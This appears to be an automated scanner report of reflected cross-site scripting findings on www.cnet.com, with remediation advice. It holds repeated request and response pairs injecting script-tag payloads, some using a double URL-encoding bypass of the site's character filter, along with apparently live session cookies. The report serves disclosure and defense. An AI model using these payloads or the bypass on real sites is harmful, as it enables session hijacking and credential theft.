Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d0aa"><script>alert(1)</script>215a7cfaa7b was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /8725-4_1-0.html?username=elinormills1d0aa"><script>alert(1)</script>215a7cfaa7b HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:17:39 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:17:38 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=987
Connection: Keep-Alive
Content-Length: 52246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<a href="/8725-4_1-0-1.html?username=elinormills1d0aa"><script>alert(1)</script>215a7cfaa7b&rpp=10" class="youAreHere">
...[SNIP]...
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ef5"><script>alert(1)</script>bb07828150b was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /8726-4_1-0.html?username=elinormillse4ef5"><script>alert(1)</script>bb07828150b HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:17:28 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:17:28 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=962
Connection: Keep-Alive
Content-Length: 47269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<a href="/8726-4_1-0-2.html?username=elinormillse4ef5"><script>alert(1)</script>bb07828150b&rpp=10">
...[SNIP]...
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6248c"><script>alert(1)</script>b9072f40778 was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /8728-4_1-0.html?username=elinormills6248c"><script>alert(1)</script>b9072f40778 HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:17:19 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:17:20 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=938
Connection: Keep-Alive
Content-Length: 46995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<a href="/8728-4_1-0-2.html?username=elinormills6248c"><script>alert(1)</script>b9072f40778&rpp=10">
...[SNIP]...
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f2f"><script>alert(1)</script>631e7278df0 was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /8734-4_1-0.html?username=elinormills68f2f"><script>alert(1)</script>631e7278df0 HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:17:29 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:17:29 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=978
Connection: Keep-Alive
Content-Length: 47101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<a href="/8734-4_1-0-2.html?username=elinormills68f2f"><script>alert(1)</script>631e7278df0&rpp=10">
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c31f%253cscript%253ealert%25281%2529%253c%252fscript%253e12830b21553 was submitted in the REST URL parameter 2. This input was echoed as 5c31f<script>alert(1)</script>12830b21553 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/24KJeWLz5c31f%253cscript%253ealert%25281%2529%253c%252fscript%253e12830b21553/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:39 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:39 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=981
Connection: Keep-Alive
Content-Length: 31136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>24KJeWLz5c31f<script>alert(1)</script>12830b21553's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce348%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c0e254f3f was submitted in the REST URL parameter 2. This input was echoed as ce348"><script>alert(1)</script>6c0e254f3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/24KJeWLzce348%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c0e254f3f/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:37 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:38 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=991
Connection: Keep-Alive
Content-Length: 31067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="24KJeWLzce348"><script>alert(1)</script>6c0e254f3f"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4888%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecb1d2fbec0 was submitted in the REST URL parameter 2. This input was echoed as d4888"><script>alert(1)</script>cb1d2fbec0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Brian.Tongd4888%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecb1d2fbec0/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:53 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:53 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=993
Connection: Keep-Alive
Content-Length: 31123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="Brian.Tongd4888"><script>alert(1)</script>cb1d2fbec0"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34b0c%253cscript%253ealert%25281%2529%253c%252fscript%253e730e2137083 was submitted in the REST URL parameter 2. This input was echoed as 34b0c<script>alert(1)</script>730e2137083 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Brian.Tong34b0c%253cscript%253ealert%25281%2529%253c%252fscript%253e730e2137083/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:55 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:55 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=970
Connection: Keep-Alive
Content-Length: 31062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>Brian.Tong34b0c<script>alert(1)</script>730e2137083's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e3a1%253cscript%253ealert%25281%2529%253c%252fscript%253e987a29172f6 was submitted in the REST URL parameter 2. This input was echoed as 9e3a1<script>alert(1)</script>987a29172f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ChrisMatyszczyk9e3a1%253cscript%253ealert%25281%2529%253c%252fscript%253e987a29172f6/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:10 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:10 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=986
Connection: Keep-Alive
Content-Length: 31112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>ChrisMatyszczyk9e3a1<script>alert(1)</script>987a29172f6's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 364ca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e049d548ff13 was submitted in the REST URL parameter 2. This input was echoed as 364ca"><script>alert(1)</script>049d548ff13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ChrisMatyszczyk364ca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e049d548ff13/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:09 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:09 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=938
Connection: Keep-Alive
Content-Length: 31146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="ChrisMatyszczyk364ca"><script>alert(1)</script>049d548ff13"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b8a4d%253cscript%253ealert%25281%2529%253c%252fscript%253e428bca84c78 was submitted in the REST URL parameter 2. This input was echoed as b8a4d<script>alert(1)</script>428bca84c78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Dan_Ackermanb8a4d%253cscript%253ealert%25281%2529%253c%252fscript%253e428bca84c78/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
